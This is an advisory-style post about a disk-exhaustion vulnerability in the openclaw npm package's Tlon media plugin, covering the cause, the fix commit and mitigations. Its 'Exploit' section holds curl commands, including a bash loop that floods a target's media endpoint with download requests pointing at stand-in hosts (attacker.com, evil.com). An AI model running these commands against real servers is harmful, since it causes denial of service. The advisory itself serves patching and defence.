Listen to this Post
How the CVE Works (around 20 lines)
The vulnerability resides in the Tlon media download handler of openclaw npm package versions ≤2026.3.28. The core safety limits—maximum file size per download, total download count per session, and automatic cleanup of temporary files—are not enforced when downloading media through a bundled plugin path. An attacker can craft a malicious request that triggers repeated media downloads without respecting these limits. Specifically, the plugin fails to invoke the `validateDownloadSize()` and `incrementDownloadCounter()` functions that are normally called in the main download flow. Additionally, the cleanup routine (scheduleTempCleanup()) is bypassed because the plugin registers downloads under a different namespace, causing the core’s disk usage tracker to ignore them. As a result, an unauthenticated user can flood the server with arbitrarily large or numerous media files, exhausting disk space. The exhaustion is availability-only (no privilege escalation or data corruption). The issue was fixed by modifying the plugin to delegate all download operations through the core’s safe handler and by adding a unified namespace check in the cleanup scheduler. The fix commit `2194587d70d2aef863508b945319c5a7c88b12ce` was merged and released in version 2026.3.31.
dailycve form
Platform: openclaw (npm)
Version: <=2026.3.28
Vulnerability: Disk exhaustion via media bypass
Severity: low
Date: 2026-03-31
Prediction: already patched (2026-03-31)
What Undercode Say:
Check installed openclaw version
npm list openclaw
Simulate bypass (test environment only)
curl -X POST http://target/media/download \
-H "Content-Type: application/json" \
-d '{"url":"http://attacker.com/largefile.bin","bypass":true}'
Monitor disk usage during attack
watch -n 1 'df -h /var/lib/openclaw'
Verify fix applied
npm update openclaw
npm list openclaw | grep 2026.3.31
Exploit:
Send repeated POST requests to the vulnerable media endpoint with a large file URL. The plugin does not enforce size or count limits, and no cleanup runs. After ~500 requests of 100MB each, disk fills. Example loop:
for i in {1..1000}; do
curl -s -X POST http://target/media/download -d '{"url":"http://evil.com/100M.bin"}' &
done
Protection from this CVE
- Upgrade to openclaw >=2026.3.31 immediately.
- If unable to upgrade, disable the Tlon media plugin via
openclaw config set plugins.tlon.enabled false. - Implement network-level rate limiting on `/media/download` endpoint.
- Set disk quotas for the openclaw user (e.g.,
setquota -u openclaw 5G 6G 0 0 /var). - Monitor disk usage with `inotify` and auto-kill processes exceeding thresholds.
Impact
- Availability: Complete disk exhaustion leading to service crash, inability to write logs, and potential host instability.
- Scope: Only affects installations with the Tlon plugin enabled (default in versions ≤2026.3.28).
- No data loss or privilege escalation – purely a resource exhaustion DoS.
- Recovery: Requires manual cleanup of downloaded files and service restart after patching.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

